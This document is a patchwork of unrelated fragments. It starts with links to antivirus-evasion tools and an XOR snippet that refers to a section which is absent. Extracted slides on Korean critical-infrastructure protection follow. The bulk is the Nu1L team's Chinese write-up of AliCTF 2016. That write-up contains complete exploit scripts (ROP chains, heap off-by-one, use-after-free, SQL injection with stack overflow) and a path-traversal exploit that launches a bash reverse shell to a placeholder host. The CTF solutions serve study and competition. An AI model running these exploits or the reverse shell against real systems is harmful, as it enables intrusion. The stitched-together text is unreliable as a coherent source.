GoBypass: https://github.com/afwu/GoBypass AniYa免杀: https://github.com/piiperxyz/AniYa Go加解密: https://github.com/wumansgy/goEncrypt
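Section 6.1 above describes the repeating-key XOR scheme but defers the code to the linked repository; as a language-agnostic illustration (the article's own implementations are in Go), a short Python sketch with placeholder data — note that the same function both encodes and decodes:

def xor_bytes(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR: applying it twice with the same key restores the input.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

sample  = b"placeholder buffer, not a real payload"
key     = b"tidesec"                            # example key
encoded = xor_bytes(sample, key)
assert xor_bytes(encoded, key) == sample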
pdf
Tram control system Hacking in Poland ‘2008.1 (Stuxnet) Nuclear power plant in Iran ‘2010.7 Banks and Broadcasting companies ‘2013.3 Waste water treatment system Hacking in Queensland ‘2000.4 Roosevelt dam hacking ‘1998.2 Georgia gov Website defaced 2008.8 Newzeland-Australia Network hacking 2007.9 Pentagon hacking ‘2007.6 Slammer warm Infection to Nuclear powerplant ‘2003.1 Train signal system sovic-F worm infection ‘2003.8 • Hacktivism • Malware, social engineering Strategic information war • Intended financial purpose • Attack by discontented people Intended cyber attack-Expert Hacker • Financial purpose • Show-off, Attacks targeted at random • Curiousity General cyber attack-Script kiddy • Targeted attack • Hired hacker • National terrorism • General attack 전 문 성 Current Social unrest Political purpose E X P E R T I S E Scale of damage Cyber attack trends Incident cases over the world - 4 - - 5 - Military Energy Transportation Banking E-Government Information & Telecommunications Health - 6 - - 7 - - 9 - - 10 - - 11 - - 12 - Committee on Information Infrastructure Protection (CIIP) Managemen t organization Disseminate the guidelines for protection plan establishment Submit the protection plan Check protection plan implementation Recommend infrastructure designation Disseminate the guidelines for protection measures establishment Proposing major agendas such as the protection plan Organizing the incident response headquarters Designate new infrastructure Submit protection measures Notify security incident Administration -Related organization Financial institutions Communica- tion-related organization Energy facilities Transportatio n-related institutions Etc. Related central administrative agencies Institutions for protection and support of CII - KISA - Information protection professional service company - ISAC - National security research institute Technical support Vulnerability analysis/ evaluation Etc. - 13 - - 15 - - 16 - - 17 - Vulnerability analysis Vulnerability evaluation  Identifying the check items  Checking by item  Assigning a risk grade  Establishing the improvement direction - 18 - - 19 - Establishing the vulnerability analysis/evaluation plan Selecting the vulnerability analysis/evaluation targets Performing vulnerability analysis Performing vulnerability evaluation Phase 1 Phase 2 Phase 3 Phase 4 - 20 - - 21 - - 22 - - 23 - Committee on Protection of Information and Communications Infrastructure (Chairman: Minister of the Office for Government Policy Coordination) Management organization Recovery and protection measures Information Infrastructure Security Incident Countermeasure Center (established upon the occurrence of a critical incident) 1. Security incident notification Related central administrative agencies Supporting recovery - related technologies Investigative agency KISA Supporting recovery - related technologies Appoint the head of the Countermeasure Center 4. Cooperation and support request 2. Quick response to prevent damage spread - 24 - MSIT NIS - Information protection professional service company - ISAC(Information Sharing and Analysis Centers) - National security research institute 3. Request recovery and protection support Thank you. Q & A Kim, Mideum belief1171@kisa.or.kr
pdf
[Nu1L] writup-for-Alictf-2016 MISC coloroverflow 首先感觉这种包名不像是 CTF 用的,所以直接 Google 之,发现是 Google Play 上开源的游戏 Color Overflow。于是下载下来进行比对,发现多出了几个类无法匹配上原 apk,所以猜测是 自己后加的。分别将多出的类分析之后,发现分别是用语发送请求、生成请求和工具类。我 将其命名为 LogClass、n 和 Utils 程序将请求生成之后向 log.godric.me 发送 POST 请求,在代码里发现数据发送之前用经过了 GZIP 压缩。在 pcap 中,也发现了这个请求,pcap 里显示确实有 Content-Encoding: gzip。用 wireshark 导出 http 数据得到了原始数据。 现 在 从 LogClass 往 上 找 , 发 现 GameView$1 里 的 new LogClass().execute(new ByteArrayOutputStream[]{v2.OutputRequestBody()});会调用 n 中的方法。然后 LogClass 里的 run 会发送。 public ByteArrayOutputStream OutputRequestBody() { try { this.output_stream.reset(); f.a(this.output_stream, this.szId); f.a(this.output_stream, this.CurMill); f.a(this.output_stream, this.Rand); f.a(this.output_stream, this.d); this.output_stream.flush(); } catch(Exception v0) { v0.printStackTrace(); } return this.output_stream; } 其中 d 是由要发送的数据进行 AES 加密后得到的,在 GetRequestBody 这个方法中。 这部分缓存了要发送的数据。a 方法有三个重载,都将输出到缓冲区。分别会先输出对应的 类型标志,21、18 和 24。接下来,字符串类型会字符串长度,然后输出字符串;字节数组 会输出一个字节表示长度,然后输出所有字节;长整型会按 7 位分组然后高位作为结尾标 志,每次输出一个字节,高位为 0 表示结束。 因此我们可以从 pcap 导出的数据中还原出 szId, CurMil, Rand, d。 szId 被计算 MD5 后,摘要作为 key(未编码成十六进制字符串),Rand 和 CurMill 进行循环 异或得到 IV。因此 key 和 IV 也可以计算出来。 再来看 AES: if(i == 0) { int j; for(j = 0; j < block_size; ++j) { block[j] = ((byte)(padded_input[j] ^ arg13[j])); } } else { int j; for(j = 0; j < block_size; ++j) { block[j] = ((byte)(padded_input[i * 16 + j] ^ block_out[j])); } } block_out = AES.EncryptBlock(block); System.arraycopy(block_out, 0, outbuf, i * 16, block_size); 这部分看出,该 AES 将上一轮的输出和输入进行异或再加密,因此是 CBC 模式。 还原出 IV 和 key,还有 encrypted 之后,便可以进行解密。解密出来发现其中包含 flag。 szid = 'bb39b07060deabd5' curmill = [0xb9, 0xe8, 0xf3, 0xd3, 0xca, 0x2a] curmill = [i & (~128) for i in curmill] curmill = sum([curmill[i] << (7*i) for i in range(len(curmill))]) print curmill rand = '46 51 4b f9 f2 b3 cd 3b f5 80 b7 cd 9b ae 45 14'.split() rand = [int(i, 16) for i in rand] import md5 m = md5.md5() m.update(szid) key = m.digest() print 'key', map(ord, key) IV = [(curmill >> (i*8)) & 255 for i in range(8)][::-1] IV = [rand[i] ^ IV[i%8] for i in range(len(rand))] IV = ''.join(map(chr, IV)) print 'IV', map(ord, IV) with open('encrypted') as f: encrypted = f.read() from Crypto.Cipher import AES aes_d = AES.new(key, AES.MODE_CBC, IV) print aes_d.decrypt(encrypted) PWN Vss 存在一个栈溢出,输入的第 0x48-0x50 个字节刚好覆盖返回地址,用 ROPgadget 找到一个 ropchain,由于第 0x48-0x50 个字节是返回地址,再找一个 add rsp ret 的 gadget 增加 rsp 的 地址就可以返回到 ropchain from pwn import * from struct import pack p = remote('121.40.56.102', 2333) recv_content = p.recvuntil('Password:\n') p2 = '' p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret p2 += pack('<Q', 0x00000000006c4080) # @ .data p2 += pack('<Q', 0x000000000046f208) # pop2 rax ; ret p2 += '/bin//sh' p2 += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8 p2 += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret p2 += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret p2 += pack('<Q', 0x0000000000401823) # pop2 rdi ; ret p2 += pack('<Q', 0x00000000006c4080) # @ .data p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8 p2 += pack('<Q', 0x000000000043ae05) # pop2 rdx ; ret p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8 p2 += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 
0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045f2a5) # syscall ; ret payload1 = 'py' + 'B' * (0x4e - 0x8) + p64(0x000000000044892a) + 'A' * (0xd0 - 0x50) + p2 p.sendline(payload1) p.interactive() fb 教科书一般的 off-by-one 脚本: #!/usr/bin/env python2 # -*- coding:utf-8 -*- from pwn import * import os # flag : alictf{FBfbFbfB23666} # switches DEBUG = 0 # modify this ''' if DEBUG: io = process('./fb') 
else: io = remote('121.40.56.102',9733) ''' if DEBUG: context(log_level='debug') # define symbols and offsets here # simplified r/s function def ru(delim): return io.recvuntil(delim) def rn(count): return io.recvn(count) def sl(data): return io.sendline(data) def sn(data): return io.send(data) def info(string): return log.info(string) # define interactive functions here def menu(): return ru('Choice:') def addmsg(length): menu() sl('1') ru(':') sl(str(length)) return def setmsg(index,content): menu() sl('2') ru(':') sl(str(index)) ru(':') sl(content) return def delmsg(index): menu() sl('3') ru(':') sl(str(index)) return def leak(addr): if '\x0a' in p64(addr): return '\x00' # :< setmsg(1, p64(addr) + p32(100)) delmsg(2) buf = ru('Done').rstrip('Done') if len(buf) == 0: return '\x00' return buf + '\x00' printf = 0x4006E0 ptr = 0x6020c0 ptr2 = 0x6020e0 freegot = 0x602018 # define exploit function here def pwn(): if DEBUG: gdb.attach(io) #elf = ELF('./fb') addmsg(248) addmsg(240) # xxx addmsg(256) addmsg(248) addmsg(240) addmsg(256) addmsg(256) addmsg(256) setmsg(7, '%17$p') payload = '' payload += p64(0) + p64(0xf1) payload += p64(ptr-0x18) + p64(ptr-0x10) payload = payload.ljust(240, '\x00') payload += p64(0xf0) setmsg(0,payload) delmsg(1) payload2 = p64(0) + p32(0) + p32(16) + p64(0) + p64(freegot) + p64(2000) + p64(0x6020e0) + p32(0x1000) setmsg(0, payload2) setmsg(0, p64(printf)[:-1]) delmsg(7) buf = ru('Done').rstrip('Done').lstrip('0x') libc_start_main_ret = int(buf, 16) #info('Libc leaked = ' + hex(libc_start_main_ret)) libc = libc_start_main_ret - 0x21f45 system = libc + 0x0000000000046590 setmsg(6, '/bin/sh;') setmsg(0, p64(system)[:-1]) delmsg(6) io.interactive() return if __name__ == '__main__': io = remote('114.55.103.213',9733) pwn() io.close() routers connect(0,1), connect(1,2)会导致 router 0 中指针单向指向 router 1, 此时 delete(1)会导致 uaf. 
脚本: #!/usr/bin/env python2 # -*- coding:utf-8 -*- from pwn import * import os # flag : alictf{S0rry_F0r_USiNG_CP1uSp1Us_vTaB1es} # switches DEBUG = 0 # libc = 2.19 ubuntu-6.9 os.environ["LD_PRELOAD"] = "./libc-x.so" # modify this if DEBUG: io = process('./routers') else: io = remote('114.55.103.213',6565) if DEBUG: context(log_level='debug') # define symbols and offsets here # simplified r/s function def ru(delim): return io.recvuntil(delim) def rn(count): return io.recvn(count) def sl(data): return io.sendline(data) def sn(data): return io.send(data) def info(string): return log.info(string) # define interactive functions here def create_route(t,name): ru('>') sl('create router') ru(':') sl(t) ru('name: ') sl(name) return def create_terminal(t,name,attached): ru('>') sl('create terminal') ru(':') sl(attached) ru(':') sl(t) ru(':') sl(name) return def delete_router(name): ru('>') sl('delete router') ru(':') sl(name) return def connect(name1, name2): ru('>') sl('connect') ru(':') sl(name1) ru(':') sl(name2) return def disconnect(name): ru('>') sl('disconnect') ru(':') sl(name) return def show(): ru('>') sl('show') return # define exploit function here def pwn(): if DEBUG: gdb.attach(io) # uaf in disconnect create_route('cisco', '123') create_route('cisco', 'aaa') create_route('cisco', 'bbb') connect('123', 'aaa') connect('aaa', 'bbb') delete_router('aaa') create_terminal('osx','hello','bbb') show() ru('to ') pie = u64(ru('\n')[:-1].ljust(8,'\x00')) - 0x204b30 info('PIE Leaked = ' + hex(pie)) got = pie + 0x204EC8 create_route('cisco', 'b1') create_route('cisco', 'b2') create_route('cisco', 'b3') create_route('cisco', 'b4') connect('b1','b2') connect('b2','b3') delete_router('b2') delete_router('b4') payload = 'A'*0x8 + p64(got) + p64(0) + p64(0)[:-1] create_route('cisco', payload) show() ru('to ') ru('to ') #offset_setvbuf = 0x70670 offset_setvbuf = 0x705a0 libc = u64(ru('\n')[:-1].ljust(8,'\x00')) - offset_setvbuf info('Libc Leaked = ' + hex(libc)) # leak heap address delete_router(payload) xxx_vtable = libc + 0x3BE060 - 8 payload2 = p64(xxx_vtable) + p64(pie) + p64(0) + p64(0)[:-1] create_route('cisco', payload2) create_route('cisco', 'feeder') delete_router('feeder') disconnect('b1') show() for i in xrange(6): ru('named ') heap_addr = u64(ru(' ')[:-1].ljust(8,'\x00')) - 0x340 info('Heap addr leaked = ' + hex(heap_addr)) # final stage create_route('cisco', 'c1') create_route('cisco', 'c2') create_route('cisco', 'c3') create_route('cisco', 'c4') connect('c1', 'c2') connect('c2', 'c3') delete_router('c2') delete_router('c4') gadget = libc + 0xE4968 payload3 = p64(heap_addr+0x450) + p64(pie) + p64(0) + p64(0)[:-1] create_route('cisco', payload3) spray = 7 * p64(gadget) create_route('cisco', spray) ''' poprdi = libc + 0x0000000000022b9a system = libc + 0x46590 binsh = libc + 0x17C8C3 ropchain = '' ropchain += p64(poprdi) ropchain += p64(binsh) ropchain += p64(system) ''' disconnect('c1') io.interactive() return if __name__ == '__main__': pwn() http 题目是一个 http 服务器,刚开始没有给 binary,经过测试发现,修改 http 头的请求目录可以导 致任意文件读取(e.g.: GET /../../../../../etc/passwd HTTP/1.1), 通过此漏洞读取/proc/self/maps 获取 binary 路径,然后得到二进制文件,分析后发现服务器处理 post 请求处有漏洞,利用见脚 本: #!/usr/bin/env python2 # -*- coding:utf-8 -*- from pwn import * import os # flag : alictf{1et's_p14y_with_thr34ds_at_httpd} # switches DEBUG = 0 # modify this if DEBUG: io = remote('127.0.0.1', 46962) else: io = remote('120.26.90.0',42665) if DEBUG: context(log_level='debug') # define symbols and offsets here # simplified r/s function def ru(delim): return 
io.recvuntil(delim) def rn(count): return io.recvn(count) def sl(data): return io.sendline(data) def sn(data): return io.send(data) def info(string): return log.info(string) # define interactive functions here def sendpost(target, content): buf = '' buf += 'POST ' buf += target buf += ' HTTP/1.1\n' buf += 'Content-Length: ' buf += str(len(content)) buf += '\n\n' buf += content sn(buf) return # define exploit function here def pwn(): if DEBUG: gdb.attach(io) # arbitary file read vuln in httpd # dumping the binary and we find post content is passed to a newly created process, which we can specify #sendpost('/../../../../../../bin/bash', 'ls -la /;exit\n') sendpost('/../../../../../../bin/bash', 'bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxx 0>&1;exit;\n') # connect back shell io.interactive() return if __name__ == '__main__': pwn() vvss sqli + 栈溢出, 利用见脚本: #!/usr/bin/env python2 # -*- coding:utf-8 -*- from pwn import * import os # flag : alictf{n0t_VerY_v3ry_secure_py} # switches DEBUG = 0 # modify this if DEBUG: io = process('./vvss') else: io = remote('120.26.120.82',9999) context(log_level='debug') # define symbols and offsets here # simplified r/s function def ru(delim): return io.recvuntil(delim) def rn(count): return io.recvn(count) def sl(data): return io.sendline(data) def sn(data): return io.send(data) def info(string): return log.info(string) # define interactive functions here def listall(): sl('py') return # select plain, len from keys where qid='%s' def query(param): buf = 'pz' buf += param sl(buf) return def todo(): buf = 'pi' sl(buf); return # define exploit function here def pwn(): if DEBUG: gdb.attach(io) #listall() query("a';insert into keys values (909, hex(fts3_tokenizer('simple')), 'bx', 100);") # use tokenizer to leak address query("bx") offset = 0x2b4d80 ru('0') buf = rn(16) sqlite_base = u64(buf.decode('hex')) - offset info('SQLite Base leaked = ' + hex(sqlite_base)) offset2lib = 0x3c5000 libc = sqlite_base - offset2lib system = libc + 0x46590 binsh = libc + 0x17C8C3 ropchain = '' ropchain += p64(sqlite_base + 0x0000000000009ef8) ropchain += p64(binsh) ropchain += p64(system) payload = 656 * 'a' + ropchain query("a';insert into keys values (31337, x'"+payload.encode('hex')+"', 'exx', "+str(len(payload))+");") query("exx") io.interactive() return if __name__ == '__main__': pwn() Reverse Al-Gebra 一个 pyinstaller 打包的程序。用 pyinstxtractor.py 解包,然后发现主 要文件是 pyimod04_builtins,修复文件头之后反编译,获得主程序 代码。 主程序从服务器获取了数据和两个函数 add 和 mul。 保存服务器发来的数据然后修复文件头反编译,得到函数内容。 程序逻辑就是做个矩阵乘法,然后检验结果。但是这里的加法和乘 法都被重新定义过了。网上搜了下,发现这玩意好像叫多项式环。 直接对 mul 函数进行一些测试。发现对于 mul(a,x)=b, a<256,b<256,x 一定有解。然后在加上异或本身的一些特性,就满 足了做方程式化简求解的要求。 然后拍了个高斯消元,注意加和乘的重定义。得解。 alictf{Ne_pleure_pas_Alfred} mat = [[207, 152, 250, 232, 183, 247, 125, 31, 89, 17 6, 139, 246, 97, 125, 76, 1, 175, 141, 61, 196], [90, 41, 196, 89, 48, 166, 201, 255, 28, 72, 1 0, 227, 134, 247, 87, 10, 219, 51, 146, 93], [76, 3, 187, 211, 246, 46, 222, 194, 67, 165, 130, 244, 221, 248, 132, 47, 91, 245, 136, 141], [223, 211, 5, 77, 225, 6, 21, 196, 120, 19, 23 3, 214, 143, 224, 2, 119, 50, 188, 90, 88], [108, 177, 46, 95, 80, 128, 125, 128, 22, 227, 179, 177, 191, 191, 7, 91, 209, 79, 31, 2], [152, 229, 184, 163, 212, 71, 125, 72, 67, 179 , 37, 173, 156, 59, 235, 79, 28, 134, 73, 245], [40, 123, 5, 233, 197, 233, 30, 18, 232, 33, 5 6, 95, 69, 44, 205, 176, 246, 7, 211, 109], [11, 28, 73, 59, 71, 154, 72, 92, 139, 27, 109 , 193, 92, 102, 17, 140, 230, 254, 181, 35], [242, 49, 103, 240, 78, 79, 46, 224, 168, 137, 147, 8, 125, 149, 197, 109, 85, 208, 254, 44], [180, 
66, 51, 154, 33, 51, 1, 33, 0, 227, 13, 192, 65, 217, 206, 204, 7, 14, 22, 232], [46, 58, 126, 154, 21, 73, 28, 130, 223, 212, 63, 69, 167, 80, 240, 8, 172, 208, 206, 76], [218, 94, 40, 0, 108, 187, 3, 9, 39, 65, 110, 26, 242, 41, 143, 100, 17, 186, 95, 127], [19, 188, 30, 252, 33, 235, 104, 10, 232, 186, 243, 211, 92, 210, 150, 146, 191, 96, 108, 208], [119, 109, 150, 141, 45, 208, 118, 47, 10, 40, 41, 47, 122, 99, 238, 244, 0, 241, 187, 198], [240, 138, 99, 154, 114, 245, 192, 199, 90, 16 6, 232, 140, 119, 243, 237, 86, 21, 5, 168, 251], [144, 99, 109, 211, 70, 17, 11, 149, 225, 17, 177, 63, 53, 146, 17, 168, 81, 50, 149, 218], [238, 179, 216, 200, 226, 215, 124, 171, 57, 1 83, 76, 165, 56, 140, 123, 197, 152, 71, 112, 242], [162, 115, 153, 111, 219, 42, 159, 188, 118, 7 7, 232, 53, 83, 223, 183, 219, 150, 177, 149, 76], [229, 216, 82, 107, 93, 225, 244, 98, 38, 190, 193, 97, 54, 27, 208, 15, 71, 39, 106, 233], [131, 13, 74, 27, 217, 248, 206, 44, 14, 71, 6 9, 62, 35, 94, 224, 126, 96, 120, 252, 11]] c = [157, 244, 209, 121, 181, 200, 239, 205, 226, 51, 188, 143, 121, 212, 12, 95, 36, 10, 251, 133] length = len(mat[0]) def mul_line(i, num): for j in xrange(length): mat[i][j] = mul(mat[i][j], num) c[i] = mul(c[i], num) def swap_line(a, b): tmp = c[a] c[a] = c[b] c[b] = tmp tmp = mat[a] mat[a] = mat[b] mat[b] = tmp def minus_line(src, dest): for i in xrange(length): mat[dest][i] = mat[dest][i] ^ mat[src][i] c[dest] = c[dest] ^ c[src] def minus_row(row, num): for i in xrange(length): mat[i][row] = mat[i][row] ^ num def print_mat(): for i in xrange(length): print mat[i] print "" def mul(a, b): r = 0 while a != 0: if a & 1: r = r ^ b t = b & 128 b = b << 1 if b & 256: b = (b ^ 215) & 255 a = a >> 1 return r def run(): lum = [[j for j in range(0, 256)] for i in range( 0, 256)] for i in range(0, 256): for j in range(0, 256): lum[i][mul(i, j)] = j for j in xrange(len(mat[0])): # print j # print_mat() end = length - 1 for i in range(j, length): if end == i: #print end break if mat[i][j] == 0: swap_line(i, end) end -= 1 # change to 1 for i in range(j, length): if mat[i][j] == 0: break mul_line(i, lum[mat[i][j]][1]) # print_mat() # up minus all for i in range(j + 1, length): if mat[i][j] == 0: break minus_line(j, i) # print_mat() ans = [] #print c for j in range(length - 1, -1, -1): xn = lum[1][c[j]] ans.append(chr(xn)) for i in range(j, -1, -1): c[i] ^= mul(xn, mat[i][j]) # print_mat() print "".join(ans[::-1]) run() Timer 逆向 so 里的函数,然后直接爆破。 代码写炸了,得到一组结果。。然后找到一些比较像 flag 的一个个 试的 alictf{Y0vAr3TimerMa3te7} #include "cstdio" #include "cmath" bool isPrime(int x){ if(x<=1) return false; for(int i=2;i<=sqrt(x);i++){ if (x%i==0){ return false; } } return true; } int func(int input) { int v3; // r0@1 int v4; // r6@1 int v5; // r1@1 int v6; // r7@1 int v7; // r0@1 int v8; // r4@1 long long v9; // r0@2 int v10; // r0@2 int v11; // r1@2 int v12; // r0@2 int v13; // r0@2 unsigned int v14; // r1@2 long long v15; // r0@2 int v16; // r0@2 unsigned int v17; // r0@2 int v18; // r0@3 int v19; // r0@6 int v20; // r0@6 int v21; // r0@6 int v22; // r0@6 int v23; // r0@6 int v24; // r0@6 int v25; // r0@6 char v26; // r0@6 int result; // r0@6 signed int v29; // [sp+8h] [bp-38h]@1 int v30; // [sp+Ch] [bp-34h]@1 char v31[18]; // [sp+10h] [bp-30h]@1 int v32; // [sp+24h] [bp-1Ch]@1 v29 = input; double b1 = input; double b13,b15; v7 = b1/ 323276.0999999999800; v8 = v7; v31[0] = v8 + v29 % 100; if ( isPrime((v8 + v29 % 100) & 0xFF) ) { v9 = b1/59865.9000000000010; v10 = v9 + 21; v12 = v10; v31[1] = v12; b13=v12; b15 = b13 * 
2.4230000000000; v16 = b15 + 1.7; v17 = v16; v31[2] = v17; if ( v17 > 0x6F ) { v18 = b1 / 24867.4000000000010; v31[3] = v18; }else{ return result; } v31[13] = 51; v31[14] = 116; v31[15] = 101; v31[16] = 55; } else { return result; v31[1] = 57; v31[2] = 67; v31[3] = -120; v31[13] = 61; v31[14] = 106; v31[15] = 111; v31[16] = 59; } v31[4] = v31[2] - 4; v19 = b1 /31693.7999999999990; v31[5] = (v19); v20 = b1/19242.6600000000000; v31[6] = (v20); v21 = (b1/15394.1000000000000); v31[7] = (v21); v22 = (b1/14829.2000000000010); v31[8] = (v22); v23 = (b1/16003.7999999999990); v31[9] = (v23); v24 = (b1/14178.7999999999990); v31[10] = (v24); v31[11] = v29 / 20992; v25 = (b1 /16663.7000000000010); v26 = (v25); v31[17] = 0; v31[12] = v26; for(int i=0;i<17;i++){ if(!( (v31[i]>='a' && v31[i]<='z') || (v31[i]>='A ' && v31[i]<='Z') || (v31[i]>='0' && v31[i]<='9') | | v31[i]=='_' )){ return result; } } printf("%s\n",v31); return result; } int main(int argc, char const *argv[]) { for (int i=20991;i<20991*129;i++){ func(i); } return 0; } showmethemoney c#写的勒索程序,逆向后发现会把 id 和 key 发到 120.26.120.82:9999。 扫了下 120.26.120.82 的端口,发现 80 开着,得到 vvss,逆向发现 输入 py 会显示所有数据。得到 key,写程序解密即可。 alictf{Black_sh33p_w411} REact reactnative 的 apk,反编译提取出 js 文件。验证程序分为两个部分。 第一个部分找到关键函数 s,提取出判断函数 e。 然后调试,发现是矩阵乘法(又是矩阵乘法)。然后提取出数据,求解 方程组即可。 第二个部分在 java 层,通过 bridge 调用,直接求解即可。 alictf{keep_young_and_stay_simple_+1s_!} 第一部分 mat=[ [ 11, 32, 31, 0, 10, 10, 6, 18, 10, 17, 16, 5, 12, 9, 26, 13 ], [ 0, 31, 15, 28, 2, 30, 18, 20, 12, 7, 12, 25, 13, 7, 11, 22 ], [ 13, 27, 8, 17, 7, 1, 17, 7, 21, 29, 8, 31, 31, 16 , 28, 26 ], [ 13, 27, 20, 19, 12, 16, 0, 4, 16, 4, 21, 9, 11, 8 , 24, 0 ], [ 17, 5, 25, 13, 14, 14, 29, 2, 24, 21, 27, 5, 20, 23, 22, 14 ], [ 6, 0, 20, 13, 24, 30, 25, 5, 32, 7, 15, 10, 6, 20 , 27, 18 ], [ 18, 28, 11, 31, 4, 16, 30, 24, 22, 7, 4, 19, 18, 11, 12, 27 ], [ 2, 23, 1, 23, 10, 12, 28, 14, 19, 3, 13, 29, 27, 9, 3, 22 ], [ 27, 30, 32, 8, 24, 11, 12, 7, 12, 26, 27, 0, 1, 3 2, 14, 25 ], [ 28, 8, 17, 10, 9, 9, 18, 16, 16, 24, 19, 25, 22, 30, 24, 10 ], [ 24, 0, 30, 10, 19, 20, 3, 25, 1, 17, 23, 25, 5, 1 6, 7, 16 ], [ 20, 1, 19, 21, 23, 27, 15, 5, 32, 30, 1, 20, 3, 2 8, 15, 12 ], [ 15, 16, 26, 9, 29, 25, 11, 10, 21, 6, 16, 12, 23, 21, 31, 32 ], [ 10, 1, 18, 27, 11, 6, 4, 23, 9, 8, 17, 31, 18, 22 , 2, 16 ], [ 11, 16, 23, 28, 10, 10, 19, 10, 10, 4, 12, 1, 0, 15, 14, 5 ], [ 2, 18, 24, 26, 23, 22, 30, 18, 18, 6, 0, 20, 17, 12, 23, 1 ] ] # 整天想搞大新闻,吃枣药丸 c=[ 25434, 19549, 19765, 28025, 27015, 23139, 26935, 29052, 20005, 25636, 25317, 26852, 20113, 24424, 22495, 22055] 第二部分 ans=[0x0e,0x1d,0x06,0x19,ord('+'),0x1c,0x0b,0x10,0x16 ,0x04,ord('6'),0x15,0x0b,0x0,ord(':'),0x0b] key='excited' output="" for i in xrange(len(ans)): output+=chr(ord(key[i%7])^ans[i]) print output LoopAndLoop 用 ida 调试发现 check 方法调用 chec,会自动调用到 check1,第一个参数被传递下去,第二 个参数被减一后传递到 check1。check1 里调用 chec 函数同理地调用 check2,check2 里的 chec 调用 check3,check3 里的 chec 调用 check1。如此递归下去,发现当第二个参数为 1 的 时候,chec 会直接返回参数一的值,也就是递归的边界。估计 native 的 chec 函数只起这样 的作用,因此不需要逆向 liblhm.so 了。check1 和 check3 都是加上一个数,check2 根据第二 个参数的奇偶决定是加上还是删除一个数。因此从最后的检查条件 1835996258 往前推 99 步 就能推出正确的输入。 from ctypes import * SA = sum(range(100)) SB = sum(range(1000)) SC = sum(range(10000)) S0 = 1835996258 for i in range(1, 99): if i % 3 == 0: S0 = c_int(S0-SC).value if i % 3 == 2: S0 = c_int(S0-SA).value if i % 3 == 1: if i % 2 == 0: S0 = c_int(S0-SB).value else: S0 = c_int(S0+SB).value print S0 print hex(S0) for i in range(98, 0, 